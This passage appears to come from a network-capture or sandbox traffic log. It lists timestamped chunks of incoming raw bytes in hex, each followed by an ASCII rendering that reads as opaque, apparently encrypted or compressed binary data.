                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26808INData Raw: 3b 49 1c 07 05 d2 b7 16 e8 7f 8a ad 77 61 61 0f 85 8f 34 37 d4 f9 78 7d 4d 84 a3 05 cc 26 4c 43 09 c6 c7 5e 87 ee f8 d1 70 03 9f b3 5e 8e e1 b9 11 a9 5b 56 ff 09 11 61 0a 0d 9a 6c 24 e2 b9 d4 8e 63 ed 5f a8 62 46 87 bb cd 10 72 be 90 00 fb 48 62 e3 dc 6e 3b 98 5c f8 0d f6 6d dc 64 95 0c 6e 83 61 b4 5d 79 97 fa d9 0b a2 d9 ff a0 b9 3d 5e fc 11 74 8a a3 0c 93 90 6b f3 9b 6d 65 1d 93 73 df 83 07 34 8f 05 a5 ff e8 ca 8e 91 16 cd d8 41 3e cb 49 5a 15 f4 bd fa 21 fa 01 28 2b 02 6b 16 5a 5b 40 45 36 d4 de a1 e1 ef 7d d0 4d 9c b0 ad dc ad 27 9e 7d ce 38 3c f9 9a bf 64 e8 2f 06 7a 87 4e a1 ca be f4 e5 4f b1 22 ce c6 64 1a be 80 62 82 20 82 59 a9 94 09 bb bc c8 b0 84 be 77 52 7e 9f 6f d7 97 22 8a a9 dc 8b 6a 97 38 4e bb 8e 71 b4 0e 84 c1 0b f3 6a f7 b1 53 25 a1 5b
                                                                                                                                                                                                                                    Data Ascii: ;Iwaa47x}M&LC^p^[Val$c_bFrHbn;\mdna]y=^tkmes4A>IZ!(+kZ[@E6}M'}8<d/zNO"db YwR~o"j8NqjS%[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26824INData Raw: 07 d0 69 ce 51 4e 13 db f1 ac cc 24 57 57 d9 64 15 24 a1 c4 86 19 90 1d 13 ac e1 f2 5e 59 6d a6 cb d2 91 8b 27 a3 44 6b 74 2a ef 0e 05 5d 6b b9 db d5 72 fd 96 5e 5d 7b 5c 08 f9 4f 48 a9 ef d6 d3 74 24 7b c7 f2 0e 4f 9d 7f 21 d9 a5 97 bb 42 56 a1 7a b5 be eb bc d8 4d 15 7c f5 1e 84 8e da bf d5 d3 60 eb 35 39 78 5a 52 cc 72 c0 81 a6 e7 1d 99 88 1e 50 50 e5 4a 38 07 d9 f3 9e 5a 7e 23 d9 84 02 c0 a3 dc 7c e3 26 6c fd e9 34 e6 61 23 6a 8a 34 65 26 3c 0d fd c4 ab bd 0a 11 32 1c a9 6d 26 9f 27 80 24 59 02 0b 07 04 c2 bf b3 f5 7b 17 58 d2 2e 4c 37 cd f5 bf 39 40 2a 4e 6d 23 47 f5 f3 d1 93 14 d1 a3 d5 0a 42 07 d6 37 71 5d 92 84 94 e3 80 25 56 3e f6 6d 2e 95 6c d2 2d 9a 90 0b 03 cc d6 ae 3b 01 79 68 51 39 7e 6d f6 ca b3 f2 d7 ec 61 15 03 76 6c cc 66 bf 7e 80 86 7f
                                                                                                                                                                                                                                    Data Ascii: iQN$WWd$^Ym'Dkt*]kr^]{\OHt${O!BVzM|`59xZRrPPJ8Z~#|&l4a#j4e&<2m&'$Y{X.L79@*Nm#GB7q]%V>m.l-;yhQ9~mavlf~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26840INData Raw: 33 aa 42 51 f0 1b 69 82 a4 be 74 2d 11 e3 a0 5f 9a 17 be 85 f2 b8 11 01 e4 22 b6 27 15 58 7e 25 8e 21 8f 66 82 c0 e5 a8 39 90 88 e8 e9 f6 68 8a c8 0d b5 1d 7b a4 76 e7 8e f2 b5 54 78 ee 51 23 40 c5 f8 74 66 d2 f7 10 79 b4 7a ed b0 e1 2b 23 4f 3a ed a8 94 e8 34 1f 2c 87 61 f2 74 74 22 3b f0 3d 58 ad f4 1f bb c3 3e 5b 05 db 36 69 29 f0 fd b4 3f 7d fc 26 c9 05 bf 7a 54 c1 0b df f5 84 78 29 7f 81 d3 7f b2 06 07 5c d3 fb 5b 33 6d bf d7 8c a3 91 61 8d 0a 0b 83 8f 4c 1e 33 3a 52 a7 f8 e2 1c f4 20 b1 dc f5 04 8e c7 40 82 b5 c5 0f 53 b0 11 49 0b a2 ba 2f f6 bc b9 b3 11 db 61 42 81 66 c5 77 bb c3 f0 aa 65 ad 5a e0 9e ba d4 01 c7 3b b9 e1 32 7b 9f 8f 0f 4d 20 3f 0e de a9 c4 94 a2 38 80 02 cf 9e 33 f4 b3 18 18 2d 8f 78 9b 4f dd 1c 45 d9 f3 5d 25 e2 3e 81 11 20 ac 02
                                                                                                                                                                                                                                    Data Ascii: 3BQit-_"'X~%!f9h{vTxQ#@tfyz+#O:4,att";=X>[6i)?}&zTx)\[3maL3:R @SI/aBfweZ;2{M ?83-xOE]%>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26856INData Raw: 4f 2e 5e d7 9c 88 c1 40 dd 7f 54 53 f7 10 68 d8 0d a1 2a 27 73 12 bc 71 6b bb c8 a8 40 bf f4 a5 a5 44 94 6f ae 97 0c ac 14 94 fc 5f 88 9f 43 52 2c 36 b8 6e 43 d7 b4 60 13 a2 27 ce 29 04 f6 54 25 d6 da 61 1a d1 27 7d b5 a4 2a b0 8b 2a 91 9e 93 ce 00 37 8f 01 41 60 d2 ce ef 5c a0 2b e6 7f c1 bd 58 db 23 32 28 8e 00 f8 0e 7b e0 6d 36 35 6a 6d 8e fc e5 c9 99 79 bb 0e 1f 9f 7d aa ee b6 22 fd f4 7d 43 ac 12 bf 39 a7 e2 c7 5b 3e e1 e2 e0 ee c2 62 82 f9 64 dd 57 da 5a 3e 4c 41 bf ab 58 09 f0 0e 82 60 43 00 5c 58 9b df 34 8e bd 60 e9 60 99 e4 2a 97 4b 30 b4 bc 87 07 35 d0 d7 f9 f0 af 11 8a e9 e0 88 bd 23 7f a2 45 5f c4 62 ff cd ca ca cf 5e 22 0b 9a 42 ec 71 72 7e 55 9f 70 c5 5a 24 0f 5a 12 36 09 55 9b 3a 98 75 18 da 0d 9b 46 be e4 f8 21 52 6d 78 9f ab 68 df 79 d0
                                                                                                                                                                                                                                    Data Ascii: O.^@TSh*'sqk@Do_CR,6nC`')T%a'}**7A`\+X#2({m65jmy}"}C9[>bdWZ>LAX`C\X4``*K05#E_b^"Bqr~UpZ$Z6U:uF!Rmxhy
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26872INData Raw: 0e 5f 7a 40 66 1f ca 0c 50 f3 83 0f b7 46 6b ed 2d bc a7 25 af 93 9d 03 de d1 e9 21 7c 6d 6e f5 10 28 a5 dc 09 87 0e a9 1c 91 40 c4 2f 90 19 83 19 bb dd 14 89 41 33 13 f9 7a 4d 9e ef bb 5d 25 c6 7a 87 f1 24 84 bf b5 33 ad 59 cb 66 c2 f1 29 cc 01 7f e4 53 43 a6 11 5c 01 0c 4f 03 5e 32 99 b1 c6 47 6d 24 6f 92 50 bf d9 b0 91 dc 45 fa 70 5c 7d 71 2c ca 47 4b cf f8 29 b2 64 1b 66 38 f9 8e 35 ff 34 9e 7a b3 a1 26 e9 5f e7 6b ab 85 08 a4 5e c3 c9 68 c1 a3 df 48 83 84 91 bd b1 b9 89 ea 9d 2f 3b bf 78 08 b6 d8 fd 84 4c 2e 21 6b 20 08 07 04 2c 74 d2 4d bd f3 1d 8a 8f 7d fe a0 bd e7 f8 bf 9e 4f e2 ea 4e 22 b9 8e c7 d8 fc 69 f6 0b 8a 18 19 27 58 63 67 2c dc d4 5c 28 e4 56 bc 43 0f c6 f5 21 cf c2 b7 9f e1 46 6c 43 b3 14 9f 70 00 49 05 be 2c 3e fc 6a 7e 3e 47 49 b2 96
                                                                                                                                                                                                                                    Data Ascii: _z@fPFk-%!|mn(@/A3zM]%z$3Yf)SC\O^2Gm$oPEp\}q,GK)df854z&_k^hH/;xL.!k ,tM}ON"i'Xcg,\(VC!FlCpI,>j~>GI
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26888INData Raw: a4 d4 f8 7f 38 c5 ae 23 e2 4a d4 8d 82 dd cc 9a d1 fe d4 61 6b b2 39 10 ff b4 1c 67 28 ab d4 d4 11 f1 5e a6 5b 2b 56 98 59 b7 f3 7c b5 5c 5c c4 67 6e 74 04 60 a6 10 87 c7 b9 4f b0 93 3d 73 81 5a cf f4 63 dc d9 b0 88 f2 8a 88 50 46 2a 6b 62 0b b6 cc 0e 75 fb cf 4a df 81 83 2b 32 cc 35 b6 31 9f 69 c0 49 23 23 05 ff e8 34 e3 fa 60 5e 74 88 a4 e7 db fd 39 73 b9 04 7e 34 b2 cf 62 ec bb df 6c 05 e4 fd bf 77 dc a4 05 39 57 4b 7f 41 5b 44 9c 46 3e fb 33 4b ec 26 7e 49 53 2a 61 b6 08 41 ec 51 bf 36 e7 a0 be f3 2a e2 bc a6 c9 60 b9 ce 67 c2 72 4f 24 18 18 8c 61 7b d6 a8 57 85 91 73 c3 a6 5d dd e2 7e 0e 5c 35 d3 6d 86 cc b5 68 41 c1 bb fe 85 7a ad f4 64 8a 3c e4 cb 90 ed b2 ac e9 df 89 3b 9e d5 b2 09 6e 98 4d 06 70 c8 66 b7 56 25 45 e7 97 d0 ac a2 65 de 07 3f 2a 52
                                                                                                                                                                                                                                    Data Ascii: 8#Jak9g(^[+VY|\\gnt`O=sZcPF*kbuJ+251iI##4`^t9s~4blw9WKA[DF>3K&~IS*aAQ6*`grO$a{Ws]~\5mhAzd<;nMpfV%Ee?*R
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26904INData Raw: 17 70 e8 5b 75 c2 3c df 35 9d 97 10 0a 63 26 57 e3 85 97 d6 86 d8 93 32 42 48 d7 c8 43 53 9c 4f e5 f7 22 be f2 5a e4 62 cd 93 9a d1 e0 de e1 0f e4 25 d1 d4 b5 99 df 8b f9 5d df 8e f0 4c fa 83 24 69 09 be 36 8f 3c 7f 5e 96 db a0 c7 b0 65 1d c6 df bc f9 be 7a 94 f9 9e 62 2c 2e f6 16 6c 9c eb 9d ae 78 b4 d1 b6 96 f3 93 c5 ec 78 b2 8c 75 67 67 75 e2 ad d2 67 04 0e 3d 9e 4c b8 d9 17 86 a1 70 5a 02 50 22 3f 08 fe e5 ee 4a 4b bd 05 f9 ad 9b 34 86 93 fe 77 2f 58 b2 af 5e 3f 66 91 e7 43 79 64 d5 74 c9 ac 33 7c 58 bb bb 8a fc 6f 2b 2c 1e c5 4c 95 43 8c a0 5c 8b 9c e4 00 d3 63 4f bc 36 9a 88 7b f1 f0 70 8f d6 c0 ef 6e 40 f7 58 1c 56 ac 45 17 ec 70 d1 44 00 6b 31 da 44 c1 99 64 87 c5 3c 40 3b 1f 58 f8 b3 ac f0 52 f4 87 fa 6b 7f 7b 94 5c e1 f4 ad 4a 99 fa bd 9a 22 b3
                                                                                                                                                                                                                                    Data Ascii: p[u<5c&W2BHCSO"Zb%]L$i6<^ezb,.lxxuggug=LpZP"?JK4w/X^?fCydt3|Xo+,LC\cO6{pn@XVEpDk1Dd<@;XRk{\J"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26920INData Raw: 36 4f d3 0f 9c af 64 37 c4 b3 67 f3 df 0a 27 6f a7 f0 36 83 7f 62 d8 b2 29 10 6a e7 81 ea 9b 76 c9 1c 38 1b cd ec 3f 5e 1c 62 ca d2 5d 30 73 e6 e0 99 01 59 cf 0f 89 05 07 bb 99 f7 de b7 05 d2 7f 38 63 96 1d 00 7d fc 09 5a 0c 51 7a a1 8f 44 17 fc ba a6 d1 a0 45 81 b2 5d 09 1e b4 b7 75 39 69 51 57 2d 22 58 c1 47 12 18 f4 1b b2 63 c0 2a 83 78 ba d4 a2 1a f2 b2 f7 07 85 12 b9 c6 7f 6e 51 a0 53 1d 11 72 52 85 7d ee 7b e9 18 6c b0 1d 34 84 7c eb 06 8a 78 17 8a f5 fa 1e 5a 9d c4 8d e2 a3 75 43 ce a1 08 bc 54 76 f7 79 b7 cb 5e c2 35 5c d3 d7 51 ce 41 f7 87 5a 58 cd fb f7 96 fa 17 ce 2b e1 c6 4e 6e e9 23 21 cd f9 49 62 1b d0 c9 d1 da e6 25 35 46 14 a0 71 fa 07 9a b1 09 b1 71 d6 df ab c9 e0 65 d5 3b 29 e9 dc 7c 02 b9 89 f4 13 fd d6 73 07 24 db 9a 19 cd cc 9e 21 4b
                                                                                                                                                                                                                                    Data Ascii: 6Od7g'o6b)jv8?^b]0sY8c}ZQzDE]u9iQW-"XGc*xnQSrR}{l4|xZuCTvy^5\QAZX+Nn#!Ib%5Fqqe;)|s$!K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26936INData Raw: 49 ef 69 55 4c 4a d9 9f 69 a8 8d 54 90 71 9e 72 e9 12 4b 57 1c 6d 33 51 be 26 a0 90 bf 70 60 64 17 c1 f5 de b0 22 f0 56 54 24 d5 a8 72 94 ba 0f d4 f1 49 74 ab de 95 c9 6e a1 66 35 05 85 75 62 94 dd f5 19 30 cc 6c 5e 7f 23 3e 57 3c a1 f7 0e 8c a6 59 5b 77 9e 03 96 5b 84 a4 f5 75 f4 f5 6d 2c 56 1c 0b cb 0c f1 b0 38 bc 60 82 1b c9 60 9a ac 5c 71 c7 cb bd e9 72 5e 30 20 a1 42 3a 06 7a b9 14 d4 3a ce af 9c c3 df 75 1d fb 48 0f 5d bd c2 27 96 d4 4e cd 2a 79 fd db ea ad 5e af db cd 95 80 fa 31 13 c4 4a 08 c4 48 d5 53 86 06 f4 2b d6 6e 59 f2 8b 87 7e c2 ea a2 66 d2 25 62 fd c6 d3 8f 04 c7 10 b7 18 81 af 13 c9 3f 23 16 80 e9 27 b2 98 b8 e2 5b 0b 32 f2 21 f7 c3 ff de ff 58 c5 3f 1d cf 89 0e 88 a2 cc 3e 63 c2 d4 98 72 5d 66 7c 0b a6 d3 b2 64 c7 2a 4d 44 5e d4 bf 5a
                                                                                                                                                                                                                                    Data Ascii: IiULJiTqrKWm3Q&p`d"VT$rItnf5ub0l^#>W<Y[w[um,V8``\qr^0 B:z:uH]'N*y^1JHS+nY~f%b?#'[2!X?>cr]f|d*MD^Z
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26952INData Raw: 75 2d e7 7d 05 23 f3 39 63 95 35 28 8c a8 7a 4f 98 50 bd 84 de 99 1a 0a 34 d0 7a dd cb fd 57 e2 37 c2 35 6b bd 3a ba 7f 29 b6 eb b1 b4 9e e8 fd 0e 2e a4 87 0f 3c cf 8d 7e 75 5b 1a 6e 9a a4 d3 eb 7e 0d 7f 35 a8 26 f9 84 80 77 c2 85 be 94 9d 8d 89 a3 ca 09 ec 80 07 05 52 74 e9 16 96 e2 cb b2 3c c7 9a 20 f6 50 1b 07 aa 65 fd 09 8b 81 3c 79 b5 4e c1 86 74 cb e3 41 fe b9 a1 e1 7a d3 87 27 37 dd f4 58 7f 55 06 2b 87 ae f4 ad 30 31 0e c0 6b c2 ef ef 3f 97 d8 dd 0e 1d 80 7d 4e bc 80 38 4d 6f 77 bf 25 48 e4 3d 16 f4 97 af c4 8a 13 c3 87 bf de cb a1 a6 59 8f 0c 7e 98 47 39 b4 ce 85 52 16 3b c7 64 72 15 1b 70 37 a2 53 4d b8 7e 0b 53 11 34 5c 8f d2 7f 0e 3c 2e 7f 96 97 58 b6 d3 e5 89 c2 91 1d eb 6a ff 29 02 ab c1 98 3c d0 32 c4 73 65 46 83 33 76 1c da 18 64 98 0c 24
                                                                                                                                                                                                                                    Data Ascii: u-}#9c5(zOP4zW75k:).<~u[n~5&wRt< Pe<yNtAz'7XU+01k?}N8Mow%H=Y~G9R;drp7SM~S4\<.Xj)<2seF3vd$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26968INData Raw: 1b 57 ce 62 90 b9 87 1a b8 58 68 a9 b7 ab 5b 7a 90 fa 08 07 4c 10 22 fc b2 1e d8 47 6c a3 45 8e 15 19 5a fc aa fe 6a 60 c6 7a 91 69 1e f2 ca 2c 11 e4 30 b4 67 c4 bd d7 58 bc cb 77 47 07 4a d3 41 1b 4c 63 74 63 7b d0 5c ca a5 75 07 b1 02 15 56 19 59 6f 91 2f 5f 88 15 fb 72 ea fa 0b 08 87 fc b1 b6 70 eb e4 55 49 8a 1d a1 11 22 a6 38 49 3f f0 b8 40 bc 5a dd 78 bc 04 80 e3 30 c8 e3 05 eb d4 cd fa 1c 3b 56 d9 bd e0 14 7c ed f4 b0 bf 1f d8 85 da 26 b8 3e 91 e1 46 d8 77 2b b9 e7 b1 49 4d 18 eb de 8c d2 23 ee c5 31 0a 63 28 50 64 93 72 4a 0d ea 87 75 aa 2d 12 de 38 8d b7 95 94 57 11 57 7e fe 8a 49 9f 1d 6c 7f 2e 63 4d 1d 80 52 50 bb de 06 47 d8 c6 b6 69 68 00 a7 83 4f 45 41 d0 95 d5 5c ca c4 63 01 e6 ce 40 d6 cb 5c 86 cc df 16 db d5 dc 10 1e c8 38 10 21 e0 e2 f8
                                                                                                                                                                                                                                    Data Ascii: WbXh[zL"GlEZj`zi,0gXwGJALctc{\uVYo/_rpUI"8I?@Zx0;V|&>Fw+IM#1c(PdrJu-8WW~Il.cMRPGihOEA\c@\8!
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26984INData Raw: 54 b2 c5 dc df da 82 50 91 3b 85 bd 2f 93 2b 1d cd d0 e8 ea a1 58 30 0a c4 94 d6 d9 81 f8 7e 18 a5 cf 40 e0 f2 ce 54 9d 98 ba f7 a0 1a e9 53 2f 81 72 b4 13 d1 5a d2 59 be 4a 09 d3 9a a2 3f 2f ce c9 8a 70 57 a5 33 e0 a4 16 0d 6a e9 0d 2b 47 ea f4 6c b4 ce ff 14 d4 1f 62 4c 14 43 0f 0e 12 ab 28 4e 94 a7 cf dc db e5 bc 92 0b b1 f3 9e 36 47 bc a4 1d 8d b0 6b 56 f8 9e c6 87 a3 19 53 8e 2d 3f 01 a0 62 54 56 f3 f6 9f dd 96 6e ac d8 75 67 72 52 13 cb ed 54 81 4e 3d 91 b8 ed b0 bf 14 9b c1 46 4b 03 40 d7 d1 2a 4d 80 d0 10 87 b7 c4 b4 17 4f 20 46 84 63 3e 3e 6f 58 10 04 8f 1e 70 21 8b 22 c6 a7 e8 57 68 57 af 00 d6 5d 04 e9 b8 63 3f c5 f6 d1 04 05 26 a3 d3 11 e3 12 79 82 04 cb c7 b2 0a 2e 18 03 95 be c6 5b b6 98 57 26 d1 c0 0d b1 9a ce de c9 76 c5 c5 eb bd 8e b1 87
                                                                                                                                                                                                                                    Data Ascii: TP;/+X0~@TS/rZYJ?/pW3j+GlbLC(N6GkVS-?bTVnugrRTN=FK@*MO Fc>>oXp!"WhW]c?&y.[W&v
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27000INData Raw: 7e 97 37 97 8f f6 63 40 d8 5b 59 bf 8f a6 52 4a 20 7f bd 0b 28 93 11 fd 46 b9 9b b1 a6 10 50 a6 3f 13 d6 ee 09 f6 b5 c8 5a 07 1a 97 f7 55 4d 05 6e 88 c1 76 03 82 ae c1 c0 98 5c 65 a2 d0 fc 33 c1 27 46 83 f1 e0 d5 04 3c bc d8 8d 60 5e 1c c9 08 03 11 f4 b8 b5 2c c8 b6 88 09 fa 9c c1 50 a6 02 98 3d a9 07 0f b1 73 a2 08 41 08 9d c7 d7 b9 e2 70 a1 d1 70 34 f0 5d e4 13 f8 10 43 02 75 22 32 3e c1 51 41 21 14 c2 b9 ce 4c 77 04 23 64 65 a6 b3 53 e4 5d a5 25 be 51 28 5a 20 b5 dd 74 d4 90 8b 01 32 16 e6 15 53 dd 25 5e 8e a3 00 f5 1f 31 60 f4 34 90 38 92 42 fd 14 72 96 4f 69 d9 b5 89 ab 16 dd cb 14 fa a1 5a 43 9a b4 bc 13 a5 54 05 5a 71 4e 07 8a 9d 14 58 a0 b6 8c d8 c4 e0 05 e5 42 68 28 9c 22 46 2f 3d 68 be 67 1f 40 c3 b4 fa 64 37 49 2b 5d 58 3c a0 11 f6 be d2 b3 11
                                                                                                                                                                                                                                    Data Ascii: ~7c@[YRJ (FP?ZUMnv\e3'F<`^,P=sApp4]Cu"2>QA!Lw#deS]%Q(Z t2S%^1`48BrOiZCTZqNXBh("F/=hg@d7I+]X<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27016INData Raw: ff 71 4b 4a 4d 24 71 da de fd ba 28 25 ac 48 f3 fa db fc d9 5a 74 2c 45 e4 24 98 41 0b e8 8d 3b c5 0e 26 6b ee 77 80 c5 a7 96 53 68 ce a9 9e f0 f4 7c dd 0d 76 b8 e1 94 6b b3 41 a1 80 d9 0a 04 57 bd 4d 3d 96 b6 de 38 67 59 a5 6d 3f 0e f3 4d c9 fa 75 0d eb 7b d5 28 48 53 98 8a 2c 76 7c e1 d6 c5 10 b7 e2 b4 20 2c 8e ac 3f be 51 2b 0e 3b 82 26 9c 49 2c b2 aa d3 b4 d9 5d 59 81 14 0f dc 39 d4 49 60 8f 87 ee 3a 8e e0 f2 31 73 ce 23 f1 cf 14 c1 e1 6d 76 70 19 49 a7 ef ca e7 02 61 f8 26 69 b0 09 34 a5 ae 33 8a 44 46 ed de a7 4b 89 94 a2 d2 f8 cd 09 fb 34 9d 47 cd ed d7 af 4f e2 1e 7c aa 7f eb 2d 01 69 b1 b4 ad 54 f0 6f 8d 68 1e 98 ee 79 8b 50 f6 0f 99 12 4d 40 26 06 36 7c 13 58 29 b8 0d 33 ed 13 9b c3 03 5a 5e 47 42 98 73 84 42 fa 59 d0 1f 9d ac f5 6d 77 f3 6d 70
                                                                                                                                                                                                                                    Data Ascii: qKJM$q(%HZt,E$A;&kwSh|vkAWM=8gYm?Mu{(HS,v| ,?Q+;&I,]Y9I`:1s#mvpIa&i43DFK4GO|-iTohyPM@&6|X)3Z^GBsBYmwmp
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27032INData Raw: 77 5e 47 27 86 d9 52 c3 f8 06 e2 2d e7 ed f8 be c0 e5 66 7b d4 3c 9f 0d b8 67 91 57 c4 aa e5 5c e9 45 05 67 c0 1d 81 3c 57 48 34 e8 ae ad 9d 1a 7a 0e ff 57 77 63 c5 4b 91 73 89 cc 1b 98 13 9c 5f 36 53 12 99 ef fc b2 f4 d5 19 63 71 4d 31 b0 46 57 4a 8d f5 94 5d e5 23 71 6a b5 1f 15 0f 07 2e bf b0 af f4 eb 1e 81 c9 ea a1 e7 17 21 c2 cf ba 76 34 77 83 2c b0 65 ef 32 71 00 9b 0b be a2 67 80 7b 81 54 f8 d7 c8 10 18 55 d2 bf ee b4 30 8f cc 74 ce 04 35 1e cd 16 a8 ca f8 d7 9d 90 4b 22 9c 95 ab e0 8d 45 a3 4c 6b b9 e3 74 a8 b4 0f b1 7e 8f bc 47 8d 61 60 d9 68 e9 20 34 7c 7a 28 8b 21 81 58 7d 0a 25 49 e0 fc ca f6 76 cd b8 83 c3 02 a6 b9 4b 87 ac 11 f1 9c a2 b3 36 69 9c 6e 36 e4 c5 87 20 a2 20 0d e5 7e 3f b8 78 e3 4a 58 21 a2 78 4b cd ed 74 1e f7 f2 9d 3a da a7 c9
                                                                                                                                                                                                                                    Data Ascii: w^G'R-f{<gW\Eg<WH4zWwcKs_6ScqM1FWJ]#qj.!v4w,e2qg{TU0t5K"ELkt~Ga`h 4|z(!X}%IvK6in6 ~?xJX!xKt:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27048INData Raw: 43 4e 89 c6 f0 5f fd 96 4a cb 09 f3 31 e9 74 38 02 d3 f7 99 ab c3 c9 bf 6d a3 77 4b 41 6b 29 f0 87 0f 2e f1 56 fa 6e 7e d2 50 f3 4f 6d 1f f6 7e bf 6a bd 50 f4 05 e0 e4 07 b3 a2 4b 58 95 32 06 1a 0c 46 f8 7b d8 ff 5a 84 30 de 3b 26 c1 bb 58 ce 11 34 d2 7f cc c2 d7 de fb 25 1a bd d1 14 36 96 ed 64 0e 93 9d ba 80 7b 1b 81 68 55 59 d5 6e 9f a4 bb f2 a2 e4 08 66 de 0a 2c 88 92 e6 cc 03 7a d2 b9 d0 b1 43 5c 43 f1 34 43 76 0d 67 9b 33 5b 0f 53 04 1c f5 33 f9 84 d1 f9 e1 94 79 3c 81 6f 61 f5 fb 46 b3 39 05 c8 9e 3a 78 13 ae 5d 1a 65 d6 3d 66 c6 80 3a d0 3c cb c9 8e fe e9 68 c2 d7 4e 69 20 83 28 16 2f 5a 09 b8 10 47 6d 75 ea 94 dc 10 24 fb 83 20 ce 46 20 99 f9 60 bf 30 a5 81 1a d9 35 d0 e2 2e a7 6b e2 79 2e 68 5e b9 2e 29 74 da 44 12 5f ab 29 c4 b6 65 29 0c 6d fc
                                                                                                                                                                                                                                    Data Ascii: CN_J1t8mwKAk).Vn~POm~jPKX2F{Z0;&X4%6d{hUYnf,zC\C4Cvg3[S3y<oaF9:x]e=f:<hNi (/ZGmu$ F `05.ky.h^.)tD_)e)m
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27064INData Raw: a0 3d 51 73 19 b4 ac bb 30 f0 9e 27 4a 47 a6 6d a4 5d c4 14 52 60 5b 81 78 15 cc c4 79 c3 8f f1 31 b6 de 7b 03 08 79 36 59 52 cf 36 dc 39 0c 2a 6e 9a 35 3f 85 5d 01 65 bd dc ee 39 91 36 06 f8 da 14 e6 82 6f fa 63 0a 85 5e c6 37 13 76 5e d8 1a c8 bd a0 9e db f7 93 b9 34 8b 5d 37 03 46 11 a6 ea 05 b5 c6 e4 53 d6 77 2b b3 02 cc 12 84 2d 7b 8e e1 10 87 9a cc 2d 4c d5 28 a6 60 b0 b6 70 8a d8 a6 48 ac 36 e7 a4 1c 35 86 a1 8b cf 5c 06 7f 6a 46 b3 ed 8c f6 2e 2f c6 70 5b 9a d3 af 62 67 2e 09 bb 02 25 89 08 ec 32 52 6a e6 20 c9 7a bd 24 b3 a7 b6 5e e0 61 9d 81 a0 3d 28 73 88 4c 64 66 04 ce f5 19 45 74 d5 2f 90 d6 2b 67 77 e6 09 7a 0f 71 80 fa 5f ca 1a a6 85 ef f9 0c 48 cb 31 cd 6b 86 63 1d d6 90 d0 6c 81 13 89 19 40 5b c4 04 f5 ba 41 3b d0 9f 1e 08 ea 75 35 57 e5
                                                                                                                                                                                                                                    Data Ascii: =Qs0'JGm]R`[xy1{y6YR69*n5?]e96oc^7v^4]7FSw+-{-L(`pH65\jF./p[bg.%2Rj z$^a=(sLdfEt/+gwzq_H1kcl@[A;u5W
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27080INData Raw: f4 b2 de ef 4d 6c b4 1a 9c 8d 39 9f c9 e0 40 23 5d 22 f7 d5 a2 57 a8 27 b7 fd fc 74 3d 3f 4b cb 4e 38 2e 4f 1d de 3f 89 1e 50 7d 88 cb e6 b7 55 bc 91 58 a4 b0 1b 44 e5 1e 89 63 04 72 bb 9b c5 14 78 f9 64 3a 6f b8 6f 19 99 91 43 6f 80 d4 6f 13 29 5c eb 70 36 25 d4 2e c5 86 99 09 e9 d9 a5 b0 10 32 dd 01 0f 15 3e bb 80 24 66 e7 97 27 9e d3 f9 3e a0 2a f0 ef 63 33 d7 63 15 ce e5 78 73 8b 23 04 df 27 42 34 87 a5 80 94 65 65 39 05 4a f1 47 12 e7 fc 51 40 cb e7 4e 47 8b b9 d0 77 0b a8 7d 85 24 7d 38 f8 d4 7e 1b 6b 84 73 32 b9 d8 70 20 7d b2 79 74 9c 2a 49 32 20 14 76 2c a1 52 9a a9 1a 19 89 34 b8 8a 71 b8 bf 93 52 d4 57 fe 50 c8 c3 36 04 2b 9e 7a e1 ab 4b 5b 08 77 81 bf 52 1a 04 fa 64 90 4e 2d d8 28 b9 68 de 08 6a 0c 33 b4 66 7c 9a cc 69 f9 af 7d 4a 65 0a db 73
                                                                                                                                                                                                                                    Data Ascii: Ml9@#]"W't=?KN8.O?P}UXDcrxd:ooCoo)\p6%.2>$f'>*c3cxs#'B4ee9JGQ@NGw}$}8~ks2p }yt*I2 v,R4qRWP6+zK[wRdN-(hj3f|i}Jes
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27096INData Raw: de 8d ec 1c 30 be f5 e6 32 95 73 2f 02 9a a1 40 2b 48 00 6a 8d 94 0a c7 a7 f8 01 95 61 30 b1 e9 d8 33 62 a2 59 5b cb b0 84 6e 29 a1 f3 f2 7c 66 ed f9 af e0 a7 20 14 47 c8 4d 14 ad ca c4 cf cc 42 0c 22 20 a3 97 2e 50 3f 7f 5a a4 8a 11 28 da 49 eb 99 2b 17 28 50 bd d7 75 0a b0 df 17 ed ec 79 cd 95 d6 cb 0c 6b 27 ec 73 19 06 39 a7 ae 93 ce 9f a3 54 df 58 a3 f6 35 bc 6e 14 f1 5b 31 34 07 b1 6b da 07 8a 1c 63 cb a3 3b c9 be a9 62 95 7f 7d 76 0c 64 85 c8 87 a9 3d b6 a3 d6 81 df 78 d4 f9 81 f7 ee 8c 4e 67 a0 8b d9 4d 48 01 72 1a 79 6d d6 d9 0e ee e0 d4 54 e2 d0 60 80 a1 60 5c d4 7c 6d 1d b2 56 65 96 94 f2 95 5d 34 03 61 2e f8 49 23 7b 41 f5 d7 71 ad f4 3a ae ca 0c 04 db 24 da 37 c1 6b f0 ca 9d 0b 5a cf 24 9e f1 47 ef fc 1b 3e dd a0 99 32 f8 a0 c8 7a 6b 74 9d 1a
                                                                                                                                                                                                                                    Data Ascii: 02s/@+Hja03bY[n)|f GMB" .P?Z(I+(Puyk's9TX5n[14kc;b}vd=xNgMHrymT``\|mVe]4a.I#{Aq:$7kZ$G>2zkt
